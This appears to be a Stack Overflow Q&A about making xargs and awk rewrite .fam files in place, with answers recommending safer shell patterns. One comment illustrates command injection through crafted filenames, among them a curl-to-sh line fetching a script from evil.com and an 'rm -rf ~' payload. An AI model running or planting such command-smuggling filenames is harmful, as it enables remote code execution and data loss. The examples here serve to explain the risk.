# How can I refer to the basename of the object/string being held in xargs {}

Tags: linux, macos, unix, xargs

I am using xargs to alter files. I would like for the command to rename the tmp file created back to the original input file name. How do I access the string being held in {} of xargs?

```
xargs - I {} COMMAND HERE {} > tmp && mv tmp {}
```

I am trying to adapt the command:

```
awk '{gsub("1","0",$6)}1' file.fam | awk '{gsub("2","1",$6)}1'> tmp && mv tmp file.fam
```

To enact the action on all files with the .fam extension in a folder:

```
ls | grep ".fam" | xargs -I {} awk '{gsub("1","0",$6)}1' {} | awk '{gsub("2","1",$6)}1'> tmp && mv temp {}
```

Comment: Show your actual command -- details matter. That said, in general, `-I{}` is a bad idea altogether and best avoided. If you write your command to take positional arguments from xargs you don't need it, and there's much less security exposure that way.

Comment: To explain what I mean about "security exposure" -- if you run `find /tmp -name '*.deleteme' | xargs -I{} sh -c 'rm {}'`, for example, then someone who creates a file named `/tmp/$(curl http://evil.com/rootme.sh | sh).deleteme` is going to make you have a very, very bad day. And yes, that's a completely valid filename. Adding quotes around the `{}` doesn't solve the issue, either; think about `/tmp/$(rm -rf ~)'$(rm -rf ~)'.deleteme` -- it works in any kind of shell quoting context (single-quoted, double-quoted, unquoted, C-like-string-quoted).

Comment: _Also_, using `xargs -I{}` implies `-n 1`; so it's not just less secure, it's also slower, because it needs to spin up a whole new subprocess for each input.

Comment: I have added my original command as well as my attempted command @CharlesDuffy.

I am not sure what a positional agreement is.... I am sorry >_<

Comment: Oh. Given the real command, you don't need xargs at all.

Comment: (also, see [ParsingLs](https://mywiki.wooledge.org/ParsingLs))

Answer (score 1):

Don't use `xargs -I` at all if you can possibly avoid it.

Assuming line-oriented input and GNU xargs:

```sh
updateFile() {
  awk '{gsub("1","0",$6)}1' <"$1" \
  | awk '{gsub("2","1",$6)}1' >"$1.tmp.$$" \
  && mv -- "$1.tmp.$$" "$1"
}

find . -name '*.fam' -print \
  | xargs -d $'\n' bash -c "$(declare -f updateFile); "'
      for arg; do updateFile "$arg"; done
    ' _
```

See also [BashPitfalls #56](http://mywiki.wooledge.org/BashPitfalls#Using_xargs_without_-0) about how all uses of `xargs` without `-0` are unsafe. (`-d $'\n'` is not as safe as `-0`, but if you can't rewrite other pipeline components to use NUL delimiters it's the 2nd-best thing).

---

That said, for your real use case, you don't need `xargs` at all.

```sh
for f in *.fam; do
  awk '{gsub("1","0",$6)}1' <"$f" \
  | awk '{gsub("2","1",$6)}1' >"$f.out" \
  && mv -- "$f.out" "$f"
done
```

Comment: Thank you. I hope my updates help as I do have single quotes and am not sure what an exported funciton is.. I am sorry.... My alternative solution would be a bash script where I feed it file paths with 'find "$(pwd)" -type f '

Comment: I also never use files with spaces and that is standard in my lab, so I think writing xargs without -0 is fine.

Comment: @SkyScraper Just because you don't _mean to_ use spaces doesn't mean they won't show up in your system. The worst data loss event I was ever present for was caused by a bug that dumped garbage into a buffer used for filenames; that garbage happened to include a `*` surrounded by whitespace, and when a buggy script tried to delete the garbage file it deleted several TB of billing data backups as well. That was the first time several colleagues had seen that kind of event before in multi-decade careers, but it was expensive enough you don't want it even once.

Comment: @SkyScraper, btw, consider `find "$PWD" -type f` -- that's a bit faster than `$(pwd)`.

Comment: @SkyScraper, see the edit showing how to deal with single quotes. (I decided not to use an exported function and instead am using `declare -f` to just emit a function declaration into the code run by the child-process shell).

Comment: I understand most. thanks alot; the only question I have is the role of `--` after the `mv`command

Comment: @SkyScraper, `--` tells `mv` (and any other tool that follows POSIX utility syntax conventions) that former arguments are literal positional arguments and shouldn't be parsed as options even if they _look_ like options. That means if you have a file whose name starts with a dash, `mv` will still process it correctly.

Comment: @SkyScraper, ...btw, since you brought the subject up, I realized that our uses of `$f` on the `awk` command line may _also_ not be safe against filenames starting with dashes, so I changed `"$f"` to `<"$f"` when it's passed as an input file to awk... though one could also solve that with an appropriately placed `--` on `awk`'s command line.